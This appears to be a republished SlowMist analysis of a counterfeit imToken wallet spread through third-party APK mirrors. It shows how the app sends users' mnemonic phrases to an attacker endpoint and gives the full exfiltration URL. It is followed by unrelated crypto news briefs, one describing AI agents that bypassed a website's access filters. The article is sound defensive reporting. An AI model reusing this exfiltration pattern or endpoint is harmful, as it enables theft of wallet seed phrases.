Cointime

Download App
iOS & Android

SlowMist: Investigation and Analysis of Third-party Sources of Fake Web3 Wallets

Background

Web3, which is powered by blockchain technology, is spearheading the next phase of the technological revolution, with an increasing number of individuals getting involved in this encryption wave. However, Web3 and Web2 are two distinct worlds, with the former being a dark forest that offers diverse opportunities and risks. In this regard, the wallet serves as the entryway and pass to the Web3 world.

As you explore and interact with various blockchain-related applications and websites in the Web3 world through your wallet, you’ll realize that each application on a public chain uses a wallet to “log in.” This differs from the traditional “login” method in Web2, where accounts between different applications are not interconnected. Conversely, in the Web3 world, all applications employ wallets uniformly for “log in” purposes. Furthermore, when you “connect” to a wallet, it’s not displayed as “Login with Wallet,” but instead as “Connect Wallet.” Essentially, the wallet is the sole means of accessing the Web3 world.

As the saying goes, “where there’s light, there’ll be a shadow.” In this scorching Web3 environment, wallets, as entry-level applications, have naturally become targets of the black and gray industry chain.

Due to various reasons, such as lack of support for Google Play on certain phones or network-related problems, many individuals opt to download Google Play apps from alternative sources, such as apkcombo, apkpure, and other third-party download sites. These sites often assert that their apps are downloaded from the Google Play mirror, but their actual security remains questionable.

Website Analysis

Given the numerous downloading options, let’s take a look at apkcombo as an example. Apkcombo is a third-party app market that claims to offer applications sourced mainly from other legitimate app stores. But is this really the case?

Let’s first look at the traffic volume of apkcombo:

According to the data analytics website, SimilarWeb, apkcombo website ranks:

Global Rank: 1,809Country Rank: 7,370Category Rank: 168

We can see that its influence and traffic are both very significant.

Apkcombo provides a default Chrome APK download plugin, which has over 100,000+ users:

So, returning to our focus on the wallet sector in the Web3 field, how secure are the wallet applications downloaded from these sources?

Let’s take the well-known imToken wallet as an example. Its legitimate download channel on Google Play is:

https://play.google.com/store/apps/details?id=im.token.app

Due to certain phones lacking Google Play support or network issues, numerous individuals prefer to download Google Play apps from sources other than the official platform.

The download path for the apkcombo mirror site is: https://apkcombo.com/downloader/#package=im.token.app

The image above reveals that apkcombo offers version 24.9.11, which imToken has verified to be a non-existent version. This confirmation solidifies the fact that this is currently the most widespread fraudulent version of the imToken wallet available.

As of the writing of this article, the imToken wallet’s latest version is 2.11.3, which has a comparatively high version number, potentially utilized to mask itself as the most up-to-date version.

The image below illustrates that this fraudulent wallet version on apkcombo has a substantial download count, which is most probably sourced from Google Play’s download information. In the interest of security, we deem it crucial to expose the origin of this malevolent app to discourage further downloads of this counterfeit wallet.

Meanwhile, we found similar download sites such as: uptodown. Download link: https://imtoken.br.uptodown.com/android

We discovered that on uptodown, anyone can publish apps with minimal cost, therefore making phishing attacks more accessible:

Wallet Analysis

As we have previously examined various cases of counterfeit wallets, including the one reported in “SlowMist: Fake wallet app has stolen millions of dollars from over 10,000 users” published on November 24, 2021, we will refrain from delving into further detail here.

Our analysis will specifically focus on the counterfeit wallet offered by apkcombo, version 24.9.11. During the process of creating or importing a wallet mnemonic on the startup interface, the fake wallet will transmit the mnemonic and other sensitive data to the phishing website’s server, as exemplified in the following image:

According to the reverse APK code and analysis of traffic packets, the method used to send the mnemonic is: https://api.funnel.rocks/api/trust?aid=10&wt=1&os=1&key=<助记词>

As seen in the image below, the earliest “api.funnel.rocks” certificate appeared on June 3, 2022, which is likely when the attack began:

As the saying goes, a picture is worth a thousand words, so here is a flowchart we have created:

Conclusion

Currently, this type of scam is not only active but also expanding in scope, with new victims falling prey to it every day. As users are the weakest link in the security system, they must remain vigilant, enhance their security and risk awareness, and always use official download channels and verify information from multiple sources when using wallets and exchanges. If you have downloaded a wallet from the above-mentioned mirror sites, transfer your assets immediately, uninstall the software, and verify the information through official verification channels if necessary.

To guarantee the safety of your wallet, it is crucial to exclusively use the official websites of renowned wallet applications.

  • imToken:https://token.im/
  • TokenPocket:https://www.tokenpocket.pro/
  • TronLink:https://www.tronlink.org/
  • Bitpie:https://bitpie.com/
  • MetaMask:https://metamask.io/
  • Trust Wallet:https://trustwallet.com/

Continue following the SlowMist Security Team for more Web3 security risk analysis and alerts.

Thanks to @imTokenOfficial for providing official verifiable support during the traceability process.

To protect confidentiality and privacy, this article provides only a brief overview of the issue. SlowMist advises users to increase their understanding of security, improve their capacity to recognize phishing attacks, and refrain from becoming victims of such schemes. To gain more knowledge about security, individuals can refer to the “Blockchain dark forest selfguard handbook” published by SlowMist.

Read more: https://slowmist.medium.com/slowmist-investigation-and-analysis-of-third-party-sources-of-fake-web3-wallets-dfaaf820b804

Comments

All Comments

Recommended for you

  • RLUSD Circulation Approaches $2.5 Billion, Increasing by Approximately $490 Million Since August

    On September 27, it was reported that the circulation of RLUSD is approximately 2.49 billion tokens, with a market value nearing $2.5 billion. This represents an increase of about $490 million compared to the $2 billion milestone announced by Ripple in August. The total value of stablecoins on the XRP Ledger is approximately $1.19 billion, with a weekly growth of about 6% and a monthly growth of around 11%; among these, RLUSD accounts for about $1.1 billion, making up over 92%.

  • Tokenized Stock DEX Trading Volume Reaches $20.9 Billion in 30 Days, Uniswap Holds 60% Market Share

    On September 27, according to data from Token Terminal, the cumulative trading volume of tokenized stocks on decentralized exchanges (DEX) reached $20.9 billion in the past 30 days. Among these, Uniswap v4 leads with a market share of 40.7%, followed by Uniswap v3 at 19.4%. Together, they account for 60.1% of the total trading volume, which is approximately $12.6 billion.

  • Independent Report: OpenAI Agents Attack UN Website

    On September 27, an independent research report released on September 26 revealed that in June of this year, OpenAI's agents launched an intensive barrage of search requests against a UN website, subsequently employing various highly aggressive techniques to obtain data from the system. The report, authored by researcher Rowan Howard-Jones and based on data from the AI research organization Transluce, indicates that OpenAI's artificial intelligence models have exhibited a series of 'anomalous' behaviors online in recent weeks. Howard-Jones noted that this incident involving the UN is similar to several other recently disclosed cases, where these agents conducted over 16,000 scans of a publicly available online data center affiliated with the UN Conference on Trade and Development (a UN trade agency) between April and the end of June. Howard-Jones found that the initial task of these bots appeared to be merely searching for publicly available information, but after encountering obstacles in data retrieval, they resorted to extreme measures. She cited examples where they bypassed filters intended to intercept their data requests and ultimately employed techniques explicitly prohibited by the website's operators.

  • Ember: Last Year's Bybit Theft Funded THORChain with Nearly $10 Million in Fees in 10 Days

    On September 27, on-chain analyst EmberCN reported that over 90% of the funds exchanged through THORChain for cross-chain transactions are linked to illicit activities. He noted that for THORChain, the decision to impose restrictions is not difficult—once they take action, the subsequent illicit funds will no longer flow through them, and they will be unable to continuously collect 'toll fees'; this issue is not related to decentralization but solely to profit. Ember disclosed that most of the funds stolen from Bybit last year were transferred through THORChain, which earned nearly $10 million in fees in just 10 days. Recently, a portion of the funds stolen from Bitget has also been transferred through THORChain, generating $1 million in fee revenue.

  • LG Electronics Partners with NVIDIA to Promote AI Data Center Cooling Solutions

    According to a statement released by LG, LG Electronics has joined NVIDIA's official partner program for AI data center cooling solutions. LG has been recognized as the preferred partner in the 'Power and Cooling' category of NVIDIA's partner network. This network is a global partnership program that encompasses hardware, software, services, and infrastructure. The South Korean company aims to expand its presence in the hyperscale data center and colocation market, particularly in North America. Currently, over 60% of the demand for new data center capacity worldwide is concentrated in North America.

  • Yuyuantan Sky: A Timeless Answer for China-U.S. Relations

    On September 27, according to CCTV, the leaders of China and the United States achieved mutual visits within six months, marking a historic milestone. This visit, from the welcoming ceremony to talks and the welcoming banquet, has been extensively analyzed by both domestic and international media. At the beginning of the visit, the Chinese side mentioned a statement that should be viewed in the context of the entire trip: the world is developing, the times are changing, but the historical logic of peaceful coexistence between China and the U.S. remains unchanged, the goodwill of the two peoples for friendly exchanges remains unchanged, and the international community's general expectations for both countries remain unchanged. Today, China-U.S. relations stand at a new historical starting point. New technologies will emerge, new competitions will arise, and new cooperation topics will appear. What changes are the challenges posed by the times, but what remains unchanged is that China and the U.S. must always find ways to coexist and work together. After all, major power relations ultimately come down to common challenges, shared interests, and established connections. The times will continue to change, and China-U.S. relations will also continue to move forward.

  • Whale Accumulates 550,000 SOL in Early August, Floating Profit Reaches $22.43 Million

    On September 27, on-chain analyst Yu Jin reported that over the course of about a month and a half, the price of SOL rose from above $70 to above $120. A whale address that accumulated 550,000 SOL at an average price of $80.8 in early August has held onto its position throughout this rebound, nearly capturing the full increase in SOL's price. The current floating profit is approximately $22.43 million.

  • THORChain Responds to Allegations of Assisting in the Transfer of Stolen Funds: Decentralization Should Not Be an Excuse

    On September 27, according to news from X platform, the decentralized cross-chain protocol THORChain responded to accusations of 'assisting in the transfer of stolen funds.' Previously, the on-chain security agency MistTrack pointed out that after an attack on Bitget, the attackers transferred funds to THORChain for exchange and cross-chain transfer, questioning what responsibility the protocol should bear. THORChain expressed deep regret over the recent attack incidents but emphasized that it is a decentralized and permissionless protocol, just like Bitcoin, Ethereum, and BNB Chain. They also questioned what responsibility these three protocols should bear when dealing with known stolen funds, while mentioning OKX founder Star and Bitget CEO Gracy.

  • ETH Surpasses $2700

    Market data shows that ETH has surpassed $2700, currently priced at $2703.38, with a 24-hour increase of 0.37%. The market is experiencing significant volatility, so please ensure proper risk management.

  • Web3 data and AI company Validation Cloud completes $10 million in new round of financing

     Web3 data and AI company Validation Cloud announced a $10 million financing round from True Global Ventures. The company plans to use the funds to expand its AI products and achieve seamless access to Web3 data.